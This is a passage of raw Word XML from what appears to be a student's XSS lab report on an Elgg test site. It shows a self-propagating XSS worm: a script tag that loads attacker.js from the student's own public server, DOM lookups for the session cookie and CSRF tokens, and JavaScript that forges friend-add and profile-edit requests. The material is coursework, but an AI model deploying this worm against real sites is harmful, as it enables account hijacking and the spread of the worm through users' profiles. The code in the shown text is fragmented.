          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I changed the parameters and </w:t>
      </w:r>
      <w:r w:rsidR="00C40292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C40292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C40292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is Alice’s friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17400B0F" w14:textId="66746AAA" w:rsidR="00465748" w:rsidRPr="00BA621D" w:rsidRDefault="000C1189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as a result, Alice (as the attacker) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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“force”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0292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(as the victim) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">be her friend just after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icked her profile</w:t>
      </w:r>
      <w:r w:rsidR="00C40292">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and let Alice be able to have his cookie and other inf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44F5240" w14:textId="77777777" w:rsidR="00BA621D" w:rsidRPr="00BA621D" w:rsidRDefault="00BA621D" w:rsidP="00E10CF3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5471FD2" w14:textId="5167ABC3" w:rsidR="000E34E8" w:rsidRPr="000C1189" w:rsidRDefault="000C1189" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc89727056"/>
      <w:r w:rsidRPr="000C1189">
        <w:t>3.5 Task 5: Writing an XSS Worm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3C4F10EE" w14:textId="2F1AD933" w:rsidR="000E34E8" w:rsidRDefault="00173A45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 To start with, I’d like t</w:t>
      </w:r>
      <w:r w:rsidR="00084AC4"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follow the guide and see the ajax demos. However, </w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">it seems </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the links attached </w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">are both </w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ut-of-</w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r w:rsidR="00327095">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. What a pity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57288BAC" w14:textId="2C01AA77" w:rsidR="000E34E8" w:rsidRPr="00E10CF3" w:rsidRDefault="00327095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32709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6F56FB8" wp14:editId="20CBD38A">
            <wp:extent cx="5181600" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="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5E63F" w14:textId="0E1B54AD" w:rsidR="000E34E8" w:rsidRDefault="00327095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32709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98C334F" wp14:editId="22993BF6">
            <wp:extent cx="4889500" cy="482600"/>
            <wp:effectExtent l="0" t="0" r="0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73DFE" w14:textId="3A9CC48F" w:rsidR="000E34E8" w:rsidRDefault="00327095" w:rsidP="00327095">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2260"/>
        </w:tabs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2709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2D6323" wp14:editId="0741109B">
            <wp:extent cx="3365500" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="图片 76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76" descr="文本&#10;&#10;中度可信度描述已自动生成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655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069D3" w14:textId="47C38B64" w:rsidR="00CE5505" w:rsidRDefault="00327095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4634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Let me see what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004634C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634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004634CA"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="004634CA" w:rsidRPr="00B76161">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LiveHTTPHeaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB47351" w14:textId="3529A527" w:rsidR="001A6B87" w:rsidRDefault="004634CA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9D3D3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9B1A02A" wp14:editId="28503976">
            <wp:extent cx="5274310" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="77" name="图片 7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图片 77" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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A78B4" w14:textId="5FEFD5E5" w:rsidR="001A6B87" w:rsidRDefault="004634CA" w:rsidP="00456C56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_gu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47.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC8D47" w14:textId="3854C193" w:rsidR="001A6B87" w:rsidRDefault="001A6B87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692E3B8" w14:textId="14FCFA78" w:rsidR="001A6B87" w:rsidRDefault="001A6B87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8219B4B" w14:textId="621A9C58" w:rsidR="009D3D32" w:rsidRDefault="004634CA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New malicious code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1FF3BE" w14:textId="230B3D57" w:rsidR="009D3D32" w:rsidRDefault="004634CA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4634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script type="text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004634CA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4634CA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4634CA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4634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=http://13.58.241.86:8888/js/attacker.js&gt; &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD58443" w14:textId="3E29F012" w:rsidR="001A6B87" w:rsidRDefault="004634CA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4634C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EBAB5E" wp14:editId="111A2445">
            <wp:extent cx="4572000" cy="431800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E090" w14:textId="6DC4A00D" w:rsidR="001A6B87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this time, since our malicious code will be longer, I need another place to store it, which is my Amazon VM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It offers a public IP, which is what I need).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19800C1D" w14:textId="605D7DE3" w:rsidR="00F912BC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DB366FF" w14:textId="44A3DBAE" w:rsidR="00F912BC" w:rsidRDefault="00F912BC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 Set up a node-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 on my Amazon VM, using pm2 tool </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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912BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/EnzeXu/Computer_Security_Enze_Xu_Final_Project.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) to make life easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018032DB" w14:textId="14BFEED3" w:rsidR="00F912BC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39CB21" wp14:editId="1162CC0A">
            <wp:extent cx="5274310" cy="1673860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="82" name="图片 82" descr="应用程序,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图片 82" descr="应用程序, 表格&#10;&#10;描述已自动生成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1DC00" w14:textId="7F21F92A" w:rsidR="00F912BC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is server (name “video” comes from my old work, not important) is set to listen any file path on “</w:t>
      </w:r>
      <w:r w:rsidRPr="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13.58.241.86:8888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” (</w:t>
      </w:r>
      <w:r w:rsidRPr="004634CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>13.58.241.86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the public IP of my Amazon VM, so everyone, including these two VMs, has access to my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</w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="0079784B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://13.58.241.86:8888/js/attacker.js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41639DEE" w14:textId="151824B6" w:rsidR="00F912BC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D2E4ABF" w14:textId="6A3AA89F" w:rsidR="00F912BC" w:rsidRDefault="00F912BC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See what will happen when</w:t>
      </w:r>
      <w:r w:rsidR="00C76BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a profile is modified u</w:t>
      </w:r>
      <w:r w:rsidR="00C76BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C76BCD" w:rsidRPr="00B76161">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LiveHTTPHeaders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C76BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC66C63" w14:textId="3A0ED991" w:rsidR="00F912BC" w:rsidRDefault="00C76BCD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C76BC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6BD5415" wp14:editId="213AF415">
            <wp:extent cx="5274310" cy="2890520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="83" name="图片 83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图片 83" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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7C9F7" w14:textId="49FBD130" w:rsidR="00F912BC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94EAB7" w14:textId="52F5E7F1" w:rsidR="00F912BC" w:rsidRDefault="00F912BC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A00A6AC" w14:textId="0606FFC9" w:rsidR="00C76BCD" w:rsidRDefault="00C76BCD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58F79B1" w14:textId="03508A6F" w:rsidR="00C76BCD" w:rsidRDefault="00C76BCD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C76BC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3DB7361" wp14:editId="2333F1BA">
            <wp:extent cx="5274310" cy="2435860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="85" name="图片 85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图片 85" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成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EBA78" w14:textId="6D6A67AF" w:rsidR="00C76BCD" w:rsidRDefault="00C76BCD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’s a new type of http-post request but not hard. Then it’s the time to combine all data we have already got together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315E4CE" w14:textId="76BF553E" w:rsidR="00C76BCD" w:rsidRDefault="0032232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 See what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is the data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000656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 have</w:t>
      </w:r>
      <w:r w:rsidR="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000656CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Tree at this stage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0656CE" w14:paraId="30E66A82" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D4511D5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41" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC9C710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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="7BC301DF" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1290D1D3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cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58CE41E6" w14:textId="2A6A8EA4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cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="1E01000A" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="032BC8BE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__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_ts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C0D6E6" w14:textId="0A7E962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elgg-menu-content")[2].href.substr(50, 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="46CD3370" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="276B38E1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__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_token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5771E0E2" w14:textId="0F0F060A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elgg-menu-content")[2].href.substr(74, 22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="34ECF5B9" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="493B3AC3" w14:textId="4020F973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my_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="004A13F9" w14:textId="18FFC1E5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spellEnd"/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 xml:space="preserve">-border-plain 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-transition")[0].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src.substr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104, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="676B5302" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646C7B26" w14:textId="6583DA16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 w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>m</w:t>
            </w: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6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30BD40CA" w14:textId="6AA6799D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spellEnd"/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 xml:space="preserve">-border-plain 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-transition")[0].alt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000656CE" w14:paraId="00F3B399" w14:textId="77777777" w:rsidTr="000656CE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F53D20B" w14:textId="035FEA7F" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE" w:rsidP="003C2004">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia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samy_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DADD5E6" w14:textId="39470D25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</w:tbl>
    <w:p w14:paraId="693FF668" w14:textId="77777777" w:rsidR="000656CE" w:rsidRPr="000656CE" w:rsidRDefault="000656CE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CE0D3E2" w14:textId="000A7FFA" w:rsidR="00F912BC" w:rsidRDefault="0032232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912BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Code of my attacker.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E70B4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 xml:space="preserve">// Task 5: just for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52B669AE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// Enze Xu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B010C35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Hello I am the attacker!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323E187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</w:p>
    <w:p w14:paraId="133E0E9D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elgg_ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gramStart"/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elgg-menu-content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href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50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10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4EC34E0A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elgg_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gramStart"/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elgg-menu-content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href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74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2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3595A788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amy_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gramStart"/>
      <w:r w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="8000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Strin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47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4948D45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okie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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:p>
    <w:p w14:paraId="0A06CF79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me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spellEnd"/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-border-plain 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-transition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0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al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</w:p>
    <w:p w14:paraId="4251FB78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my_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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spellEnd"/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-border-plain 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-transition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0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rc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104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5E29125E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samy_id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amy_id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68B28FF0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cookie = "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oki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548EAB1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__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elgg_ts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elgg_ts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79604F7B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__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elgg_token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elgg_token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7ED610F3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me = "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m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75553070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my_id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my_id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603023C2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</w:p>
    <w:p w14:paraId="31D8B90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if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me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!</w:t>
      </w:r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Samy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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FC697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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r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// make friends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B288C4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proofErr w:type="gramStart"/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ull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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33358EF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ew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XMLHttpRequest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8BB33D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http_url1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gram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http://www.xsslabelgg.com/action/friends/add?friend=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amy_id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&amp;__elgg_ts=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__elgg_ts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&amp;__elgg_token=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__elgg_token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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30C06DDD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http_url1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614377F2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open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POST</w:t>
      </w:r>
      <w:proofErr w:type="gram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http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_url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tru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745D75BF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Host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www.xsslabelgg.com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407B23B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Keep-Alive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300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4F16CD2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Connection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keep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-alive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38C9DDB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Cookie</w:t>
      </w:r>
      <w:proofErr w:type="gram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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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334B68F5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Content-Type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application/x-www-form-urlencoded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6F0650A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nt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//var content="name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&amp;description=...&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051D63C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nd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tent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3E94B07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</w:p>
    <w:p w14:paraId="6942719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// alter profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C75B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proofErr w:type="gramStart"/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ull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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A0CA860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ew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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spell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12A43BE0" w14:textId="3B2FE361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http_url2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'http://www.xsslabelgg.com/action/profile/edit?__elgg_token='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__elgg_token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'&amp;__elgg_ts='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__elgg_ts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'&amp;name='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m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'&amp;description=&amp;accesslevel[description]=2&amp;briefdescription=&lt;script type="text/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javascript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 src=http://13.58.241.86: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8888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/js/attacker.js&gt;&lt;/script&gt;&amp;accesslevel[briefdescription]=2&amp;location=&amp;accesslevel[location]=2&amp;interests=&amp;accesslevel[interests]=2&amp;skills=&amp;accesslevel[skills]=2&amp;contactemail=&amp;accesslevel[contactemail]=2&amp;phone=&amp;accesslevel[phone]=2&amp;mobile=&amp;accesslevel[mobile]=2&amp;website=&amp;accesslevel[website]=2&amp;twitter=&amp;accesslevel[twitter]=2&amp;guid='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my_id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</w:p>
    <w:p w14:paraId="4199C16A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http_url2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429DCC76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open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POST</w:t>
      </w:r>
      <w:proofErr w:type="gram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http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_url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tru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3AB99340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Host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www.xsslabelgg.com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7C52C38E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Keep-Alive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300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0E251F77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Connection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keep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-alive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4134DBE4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Cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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okie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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3E4947E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Content-Type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application/x-www-form-urlencoded"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13217760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ntent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"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//var content="name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&amp;description=...&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>=";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED49F0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send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tent</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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7B3A282B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123EB5E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else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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A091E6F" w14:textId="20806780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proofErr w:type="gramStart"/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32232C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"I am </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r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amy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0032232C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, I don't need to be my friend or alter my profile."</w:t>
      </w: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AE16563" w14:textId="77777777" w:rsidR="0032232C" w:rsidRPr="0032232C" w:rsidRDefault="0032232C" w:rsidP="0032232C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240" w:lineRule="atLeast"/>
